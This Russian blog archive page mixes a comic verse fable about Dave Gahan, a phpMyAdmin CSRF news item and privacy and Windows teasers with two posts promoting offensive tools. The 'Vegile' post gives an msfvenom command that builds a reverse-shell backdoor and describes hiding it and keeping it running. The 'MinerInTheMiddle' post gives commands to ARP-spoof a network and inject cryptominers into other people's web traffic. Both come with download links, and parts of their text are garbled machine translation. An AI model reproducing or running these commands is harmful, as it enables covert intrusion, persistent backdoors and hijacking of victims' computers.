Архив рубрики: Публикации

Басня про Дэйва Гаана и шаверму (история в стихах)

дэйв гаан в минской больнице

Жара, июль. Все Дэйва знают —
Приехал в Минск, чтоб дать концерт.
Коллег по группе он оставил,
И пройтись решил в обед.
Перед концертом есть хотелось,
Страдал желудочек пустой.
«Нужно срочно что-то слопать!» —
Подумал Дэйви озорной.
Но нет ни «Сникерса», ни «Марса»,
Ни даже чипсины простой.
На малой родине картошки
Её не оказалось под рукой.
И тут подумав колоссально,
Решил проблему как пахан —
И в забегаловке вокзальной
Поел шавухи Дэйв Гахан.
Вдруг пук, ещё один, и интро «Пэйна»
Где-то сзади начало звучать!
Кто рядом был — уже не помнят…
Картины той им не собрать.
Живот болит, в глазах стемнело,
И звёздный запах не так чист;
Трясётся, плачет и боится,
Что не дотянет до толчка артист.
Страшно кашлянуть словечко:
О каком концерте идёт речь?!
Спасайте бедную овечку,
Что мясо волчье решило съесть.
Обманули, планы поломали:
Одна шаверма изменила всё.
Концерта нет, и денежек папане:
Это, брат, фиаско, ё-моё.
Но всё ж отчаиваться рано:
Остались в Минске храбрые врачи,
Что утку поменяют храбро
И здоровья пожелают на «апчхи!».
Поднесут таблетки с утра рано,
В туалет бумаги подадут —
«Росли мы с музыкой волшебной,
Что в мире депеш мод зовут!».
Флетчер вечером украдкой
В авоське принесёт банан:
«А, тебе нельзя бабаны, что ли, братка?
Сожру его тогда я сам».
Поддержит словом добрым, мудрым
Дружище лучший — Мартин Гор.
Пошутит про незадачливого друга
И сам послушает свой ор.
Пару дней — Дэйв как огурчик!
Плоды лечение дало.
И только сёстры медицинские немного
Побудут во смущениях ещё.
Концерта нет, но опечаленных нет тоже —
Рады все финалу басни сей.
И на экранах миллионов —
Больной смеётся в окружении врачей.
17.01.2018 0:49
Из заметок на iPad

Автор: Владимир Моденов

Закрываем уязвимость PhpMyAdmin

PhpMyAdmin – наиболее распространенная тулза для администрирования MySQL и MariaDB через веб-интерфейс. Огромное множество сайтов, особенно на хостингах, имеют ее в своем составе.

И вот внезапно, в столь широко используемой и вроде протестированной вдоль и поперек штуке, обнаруживается CSRF!

Для тех, кто далек от веба: CSRF – провокация пользователя на отправку веб-запроса с параметрами, заданными хакером, из браузера пользователя. При этом используется сессия пользователя. А отправка запроса может происходить автоматически при заходе на контролируемую хакером страницу.

В данном конкретном случае CSRF позволяет удалить таблицы и данные из базы данных.

Ну ниче, жить еще можно, если есть бэкап.

Дыра пофикшена в уже выпущенной версии 4.7.7 phpMyAdmin. Но обновились еще точно не все, так что взломщики могут пошалить с публичными сайтами.

Источник https://t.me/informhardening



2018-01-16T16:40:10
Закрытие уязвимостей

DuckDuckGo: Миф о приватности №2. Меня защищает мой пароль!

Существует множество мифов, связанных с вопросами приватности. И команда конфиденциального поисковика DuckDuckGo решила разобраться, какие из них выдумка, а какие действительно могут оказаться правдой. Перевод заметки из официального блога компании. Мифы о приватности:№2. Мой пароль надёжно защищает мои учётные записи! Если для разных сайтов вы используете один и тот же пароль, все

Автор: Alex Semёnov-Sherin
Дата публикации: 2018-01-16T18:36:00.001+07:00

Vegile – Призрак в шелле

Vegile – Призрак в шелле

Vegile – это инструмент для работы в Postfix.

Технология Post Exploitation гарантирует, что мы поддержим некоторый уровень доступа и потенциально может привести к более глубоким позициям в нашей целевой сети.

Этот инструмент будет настраивать ваш backdoor / rootkits, b  когда бэкдор уже настроит его, будет скрыт ваш процесс sposeifc, неограниченный  и прозрачный сеанс в metasploit.

Даже когда он будет убит, он снова запустится.

Вы можете использовать thefatrat для помощи в создании простого бэкдора:

 # msfvenom -a x86 --platform linux -p linux/x86/shell/reverse_tcp LHOST=IP LPORT=PORT -b "x00" -f elf -o NAME_BACKDOOR

Для скрытого процесса,вы можете использовать руткиты, бэкдоры, и ботнет {sh, python, perl, exe и binary}.

Целевые жертвы для всех дистрибутивов Linux включают (base32 и base64 в их системе)

Для получения атозапуска вы можете использовать crontab и xinit.d в своем бэкдоре.

Как начать

 #  git clone https://github.com/Screetsec/Vegile.git

# cd Vegile

# chmod +x Vegile

Использование Vegile

Запуск Vegile без каких-либо параметров даст полезный список наиболее распространенных опций. вы можете использовать команду:

 #  Vegile -i / --inject [backdoor/rootkit]

# Vegile -u / --unlimited [backdoor/rootkit]

# Vegile -h / --help

Скачать Vegile

 



2018-01-15T16:58:34
Скрипты

MinerInTheMiddle – скрипт, который позволяет вам вводить javascript-майнеры всем в вашей локальной сети

Miner In The Middle Автор – Энтони Рассел @DotNetRussell

Не для незаконного использования! (если вы не владеете сетью или не имеете разрешения от всех на ней, это незаконно)

ВСТУПЛЕНИЕ:

Miner in the Middle – это скрипт, который позволяет вам вводить javascript-майнеры всем в вашей локальной сети.

Он делает это путем arp спуфинга сети и ожидания HTTP-трафика.

Как только он ее увидит, он вводит в трафик javascript coinhive и возвращает его клиенту.

Стандартный режим делает это на любой странице, которую просматривает человек.

Режим pop in открывает свою запрошенную страницу на новой вкладке и оставляет майнер на старой вкладке. 

ИСПОЛЬЗОВАТЬ:

Сначала вам нужно убедиться, что у вас есть MitMf, а также Twisted version 15.5.0.

Для установки зависимостей выполните: 

 # /miner_itm.sh --install

—- Чтобы запустить стандартную атаку майнера —-



Стандартная сетевая атака arp обманывает сеть, а затем вводит майнер в ответы HTTP.

Для запуска стандартной атаки на майнер:

 # ./miner_itm.sh <coinhive api key> <gateway ip> <eth0 >

—- Для запуска всплывающей майнер атаки —-

Атака popup miner попытается вставить скрипт в ответы HTTP.

Скрипт будет ждать, пока пользователь нажмет кнопку.

Когда они это сделают, появится всплывающее окно со своим сайтом, а в исходном окне появится майнер.

Первый запуск:

 # ./miner_itm.sh --generate <coinhive api key>

и поместите payload.html в корневой каталог вашего веб-сервера

Второй запуск:

 # ./miner_itm.sh -p <gateway ip> <interface name> <web server ip>

Скачать MinerInTheMiddle



2018-01-15T16:46:09
Скрипты

Как ускорить загрузку Windows 10

Со временем система будет загружаться всё дольше и дольше. Когда-нибудь это приведёт к тому, что процедура включения начнёт отнимать слишком много времени. Но есть способы, позволяющие её ускорить.

Читать